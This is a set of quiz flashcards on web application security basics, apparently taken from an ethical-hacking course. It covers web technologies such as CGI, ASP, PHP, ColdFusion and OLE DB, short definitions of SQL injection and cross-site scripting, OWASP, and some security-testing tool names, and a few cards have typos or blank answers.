quiz 10 Flashcards
OLE DB relies on connection strings that enable the application to access the data stored on an external device.
True
In Windows, IIS stands for _____
nternet Information Services
__ is the interface that describes how a Web server passes data to a Web browser.
CGI
___ represent(s) a comment in SQL.
Double hyphens (–)
Connecting to a VSAM database with OLE DB requires using ____ as the provider.
SNAOLEDB
Dynamic Web pages need special components for displaying information that changes depending on user input or information obtained from a back-end server. What kind of components can Web pages use to achieve this?
To do this, dynamic Web pages can use the tag, Common Gateway Interface (CGI), Active Server Pages (ASP), PHP, ColdFusion, JavaScript, and database connector strings, such as Open Database Connector (ODBC).
foundation of most Web applications
HTML
main role is passing data between a Web server and Web browser
CGI
language developed by Microsoft
JScript
keeps attackers from knowing the directory structure on an IIS Web server
virtual directory
a Web server
Apache
stands for cross-site scripting flaw
XSS
helps beginning Web application security testers gain a better understanding of the areas covered in the OWASP top ten Web applications vulnerability list
WebGoat
tool for searching Web sites for CGI scripts that can be exploited
Cgi Scanner v1.4
GUI tool that can be downloaded free from Microsoft and is included in the IIS Resource Kit
Wfetch
JavaScript is a server-side scripting language that is embedded in an HTML Web page.
False
One of the best Web sites to find tools for hacking Web applications is ___
http://packetstormsecurity.org
Web applications written in CFML can also contain other client-side technologies, such as HTML and JavaScript.
True
__ is one of the best tools for scanning the Web for systems with CGI vulnerabilities.
Cgiscan.c
SQL ____ involves the attacker supplying SQL commands when prompted to fill in a Web application field.
injection
A user can view the source code of a PHP file by using the browser’s “View Source” option.
False
CGI programs can be written in many different programming and scripting languages, such as C/C++, Perl, UNIX shells, Visual Basic, and FORTRAN.
True
CFML stands for _______________
ColdFusion Markup Language
What is OWASP?
Much like ISECOM, Open Web Application Security Project (OWASP) is an open, not-for-profit foundation dedicated to finding and fighting the causes of software vulnerabilities. OWASP (www.owasp.org) publishes the Ten Most Critical Web Application Security Vulnerabilities paper that has been built into the Payment Card Industry (PCI) Data Security Standard.
Connecting to an MS SQL Server database with OLE DB requires using ____ as the provider.
SQLOLEDB
__, developed by Microsoft, is a set of interfaces that enable applications to access data stored in a database management system
OLE DB
What is the main difference between HTML pages and Active Server Pages (ASP)?
The main difference between HTML pages and Active Server Pages (ASP) is that with ASP, developers can display HTML documents to users on the fly. That is, when a user requests a Web page, one is created at that time.
In a(n) ____ flaw, a Web browser might carry out code sent from a Web site.
cross-site scripting
ColdFusion uses its own proprietary tags written in ____
CFML
The column tag in CFML is ____
Why should security professionals have at least a little knowledge about the Apache Web Server?
Apache Web Server is said to run on more than twice as many Web servers as IIS, so some familiarity with this Web server can be helpful in the security-testing profession. Apache has important advantages over the competition: It works in just about any *nix platform as well as in Windows, and it’s free.
What is VBScript?
Visual Basic Script (VBScript) is a scripting language developed by Microsoft. You can insert VBScript into your HTML Web pages to convert static Web pages into dynamic Web pages. The biggest advantage of using a scripting language is that you have the features of powerful programming languages at your disposal. For those who have programming experience, you can start writing VBScript faster than a dual-processor 3 GHz computer.
The JavaScript getElementByld() function is a method defined by the ____ Document Object Model (DOM).
W3C
All CFML tags begin with “___
CF
What is ActiveX Data Objects (ADO)?
ActiveX Data Objects (ADO) is a programming interface for connecting a Web application to a database. ActiveX defines technologies that allow applications, such as Word or Excel, to interact with the Web. For example, you can place an Excel spreadsheet in a Web page.
Web servers use the ____ element in an HTML document to allow customers to submit information to the Web server.
What is ColdFusion?
ColdFusion is a server-side scripting language used to develop dynamic Web pages. Created by Allaire Corporation, it’s now owned by Adobe Systems, Inc., ColdFusion it integrates Web browser, Web server, and database technologies. It uses its proprietary tags written in ColdFusion Markup Language (CFML), and Web applications written in CFML can contain other client technologies, such as HTML and JavaScript.
Visual Basic Script (VBScript) is a scripting language developed by __
Microsoft
What can an attacker do after gaining control of a Web server?
After an attacker gains control of a Web server, he or she could do the following:
- Deface the Web site
- Destroy the company’s database or offer to sell its contents
- Gain control of user accounts
- Perform secondary attacks from the Web site
- Gain root access to other application servers that are part of network infrastructure
As a security professional, what should you do after identifying that a Web server you are testing is using PHP?
After you have identified the Web server as using PHP, you should use the methods you have learned in the book to investigate further for specific vulnerabilities. For example, several versions of PHP running on Linux can be exploited because of a line in the Php.ini file: The line file_uploads=on permits file uploads; however, this setting might allow a remote attacker to run arbitrary code with elevated privileges. The best solution is to upgrade to the latest version of PHP, but if that’s not possible, change the line to file_uploads=off.
___ was originally used primarily on UNIX systems, but is used more widely now on many platforms, such as Macintosh and Windows
PHP
Connecting to a MySQL database with OLE DB requires using ____ as the provider.
MySQLProv
What is JavaScript?
A popular scripting language used to create dynamic HTML Web pages is JavaScript. JavaScript also has the power of a programming language. As with VBScript, you can branch, loop, test, and create functions and procedures within your HTML Web pages.
What is ODBC used for?
The ODBC interface allows an application to access data stored in a database management system (DBMS), such as Microsoft SQL, Oracle, or any system that can recognize and issue ODBC commands. Interoperability between back-end database management systems is a key feature of the ODBC interface, allowing application developers to focus on the application without worrying about any specific DBMS.
__________________ Web pages display the same information regardless of the time of day or the user who activates the page.
Static